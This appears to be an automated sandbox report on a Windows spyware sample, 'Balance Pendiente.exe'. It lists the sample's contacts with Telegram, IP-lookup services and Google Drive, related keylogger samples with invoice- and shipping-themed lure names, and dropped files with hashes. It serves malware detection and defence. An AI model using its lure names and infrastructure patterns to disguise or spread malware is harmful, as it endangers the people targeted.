            https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000006.00000002.2993742272.0000000021DF6000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://reallyfreegeoip.org | msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
172.217.18.14 | drive.google.com | United States | 15169 | GOOGLEUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1623448
Start date and time: 2025-02-25 08:25:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Balance Pendiente.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/15@5/5
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 132
• Number of non-executed functions: 65
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.67
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 5660 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6964 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:26:38 | API Interceptor | 40x Sleep call for process: powershell.exe modified
02:27:41 | API Interceptor | 74545x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Profoma MATERIAL LISTO________Pdf.exe | malicious | MSIL Logger, MassLogger RAT |
149.154.167.220 | 14007799_MINES SERVICES SURINAME N.V.vbs | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | DHL Shipment Document.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | DHL Shipping Details Ref ID 44633179800-pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exe | malicious | MSIL Logger, MassLogger RAT |
149.154.167.220 | RFQ R2100131125.pdf.scr.exe | malicious | MSIL Logger, MassLogger RAT |
149.154.167.220 | Minty.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | https://meta-bussiness-support.pages.dev/check-community-2692560460(Si | malicious | Unknown |
149.154.167.220 | PRUEBA 2.exe | malicious | GuLoader, Snake Keylogger |
104.21.96.1 | PO.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
104.21.96.1 | OEoRzjI7JgSiUUd.exe | malicious | Lokibot | touxzw.ir/sss2/five/fre.php
104.21.96.1 | REQUEST FOR QUOTATION 2025.exe | malicious | FormBook | www.clouser.store/3r9x/
104.21.96.1 | http://verification-center-00225526.iwantfoundation.org/ | malicious | Unknown | verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp
104.21.96.1 | uI1A364y2P.exe | malicious | FormBook | www.tumbetgirislinki.fit/k566/
104.21.96.1 | gH68ux6XtG.exe | malicious | FormBook | www.tumbetgirislinki.fit/k566/
104.21.96.1 | Drawing.bat.exe | malicious | FormBook | www.lucynoel6465.shop/5f9p/
104.21.96.1 | pappy.ps1 | malicious | FormBook | www.cheapwil.shop/8cv8/
104.21.96.1 | Payment Swift Copy 76432650263970239=.exe | malicious | FormBook | www.clouser.store/3r9x/
104.21.96.1 | SecuriteInfo.com.W32.AutoIt.WG.gen.Eldorado.29861.20258.exe | malicious | FormBook | www.clouser.store/m93s/
158.101.44.242 | DHL- CBJ520818836689.pdf.bat.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | Shipping Doc.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | PO-264725.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | PO# ENQ8864.Pdf.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | Commercial Invoice-011212250.vbs | malicious | Unknown | checkip.dyndns.org/
158.101.44.242 | AWB_3570456515#U00b7PDF.scr.exe | malicious | MSIL Logger | checkip.dyndns.org/
158.101.44.242 | Swift Copy_19.02.2025.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | proforma fatura No. 90273641836.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | Profoma MATERIAL LISTO________Pdf.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
checkip.dyndns.com | Commercial Invoice1.cmd | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | 14007799_MINES SERVICES SURINAME N.V.vbs | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | DHL Shipment Document.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | DHL Shipping Details Ref ID 44633179800-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | CERENAK-8392.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | RFQ R2100131125.pdf.scr.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | Minty.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
reallyfreegeoip.org | Profoma MATERIAL LISTO________Pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | Commercial Invoice1.cmd | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | 14007799_MINES SERVICES SURINAME N.V.vbs | malicious | GuLoader, Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | DHL Shipment Document.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
reallyfreegeoip.org | DHL Shipping Details Ref ID 44633179800-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
reallyfreegeoip.org | CERENAK-8392.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
reallyfreegeoip.org | SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | RFQ R2100131125.pdf.scr.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | Minty.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
api.telegram.org | Profoma MATERIAL LISTO________Pdf.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
api.telegram.org | 14007799_MINES SERVICES SURINAME N.V.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | DHL Shipment Document.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | DHL Shipping Details Ref ID 44633179800-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
api.telegram.org | RFQ R2100131125.pdf.scr.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
api.telegram.org | Minty.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | https://meta-bussiness-support.pages.dev/check-community-2692560460(Si | malicious | Unknown | 149.154.167.220
api.telegram.org | PRUEBA 2.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.7122.15013.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://meta-bussiness-support.pages.dev/check-community-2692560460(SiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        ORACLE-BMC-31898USCommercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        71Jx3gwamwuCIHy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        SKMINV_021820.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        DHL- CBJ520818836689.pdf.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        z35Payment-swift1039.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousCryptOne, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        CLOUDFLARENETUShttps://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiyGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Profoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 172.67.197.8
                                                                                                                                                        f2FzB60knO.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                        • 172.64.41.3
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Rooming list.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        PO-TS006630009-MRTUNNING.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 172.67.197.8
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eimage_2025-02-25_14-09-05-.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Profoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Rooming list.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        PO-TS006630009-MRTUNNING.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        SKMBBT_25022025.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19BANK SLIP_TT COPY_0636300773456864-2-20-2024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        SKMBBT_25022025.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        LocaWeb 373400#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        1101011011.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        #U00e1raj#U00e1nlat#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dllPRUEBA 2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                          KWbWCYe6LB.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              #U8fdd#U89c4#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                hnTW5HdWvY.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6656
                                                                                                                                                                  Entropy (8bit):5.028908901377071
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                                                                                                                                                  MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                                                                                                                                                  SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                                                                                                                                                  SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                                                                                                                                                  SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                                                                                                                                                  Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: PRUEBA 2.exe, Detection: malicious
• Filename: KWbWCYe6LB.exe, Detection: malicious
• Filename: DOCU800147001.exe, Detection: malicious
• Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious
• Filename: hnTW5HdWvY.exe, Detection: malicious
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):507280
                                                                                                                                                                  Entropy (8bit):7.58580269013346
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
                                                                                                                                                                  MD5:E70E71A31781B44F850A39693784CE74
                                                                                                                                                                  SHA1:CE8CF2DC1B30D5D6870CC3D374C15E1005FDC879
                                                                                                                                                                  SHA-256:A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7
                                                                                                                                                                  SHA-512:2A7994CEC6638F7FF523358E7DF0BFDDAD0F2ABAEF89E598455E9F0B7A44009E139AC9F9AFD7AC38377ED302727C5C75322327B8FABF0B450835CDBB5C52A9A8
                                                                                                                                                                  Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 38%
• Antivirus: Virustotal, Detection: 44%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@..........................................................................s.......`..P............................................................................p...............................text...jZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...P....`.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
